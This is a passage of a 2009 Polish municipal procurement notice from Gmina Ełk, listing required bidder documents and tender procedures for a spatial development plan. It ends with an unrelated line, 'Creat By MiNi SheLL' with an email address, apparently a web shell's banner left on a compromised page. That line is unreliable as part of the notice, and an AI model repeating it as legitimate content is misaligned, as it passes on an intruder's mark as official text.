1.	Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert lub potwierdzenie aktualności przez organ wydający wypis),
2.	Oświadczenie oferenta, że nie podlega wykluczeniu z postępowania na podstawie art. 24
ust. 1 i spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych
( na załączonym druku ) (w przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy).- załącznik Nr 2,

3.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. (w przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy).

4.	Aktualne zaświadczenie właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. (w przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy).

5.	Wykaz wykonanych usług sporządzony wg Załącznika nr 4 do SIWZ, potwierdzający spełnienie warunku udziału w postępowaniu, o którym mowa rozdziale V.1.ppkt 2 SIWZ tj. wykonał w okresie 3 ostatnich lat co najmniej jeden uchwalony plan zagospodarowania przestrzennego o min. powierzchni min. 30 ha.


6.	Dokumenty stwierdzające, że dane osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj. 
a)uprawnienia urbanistyczne;

7.	Zaakceptowany projekt umowy ( na załączonym druku ) - załącznik Nr 6,
Wymagane dokumenty mogą być przedstawione w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania oferenta.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej   
Polskiej zamiast dokumentu, o którym mowa powyżej, składa dokument   wystawiony w terminie  i  formie określonej w  § 2 Rozporządzenia  Prezesa   Rady Ministrów z dnia 19 maja 2006 r., w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich dokumenty te maja być składane.
Dokumenty składane w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. Kopia tłumaczenia musi być poświadczona wg poniższych zasad.

Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność  z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokutemu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.

Pełnomocnicy działający w imieniu Wykonawcy muszą wykazać swoje umocowanie do działania. Pełnomocnictwo legitymuje pełnomocnika do wykonywania czynności prawnych w imieniu mocodawcy zatem jego zakres i okres obowiązywania powinien być wyraźnie i precyzyjnie określony.
Pełnomocnictwo winno być dołączone do oferty w oryginale lub kopii uwierzytelnionej przez Mocodawcę lub notariusza. Przyjmuje się, że udzielone pełnomocnictwo upoważnia do poświadczenia kopii innych dokumentów składanych wraz ofertą, z wyłączeniem pełnomocnictwa..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.elk.gmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ełk
ul.Armii Krajowej 3 19-300 Ełk
pok. nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 09:00, miejsce: Urząd Gminy Ełk
ul.Armii Krajowej 3 19-300 Ełk
pok. nr 1(sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com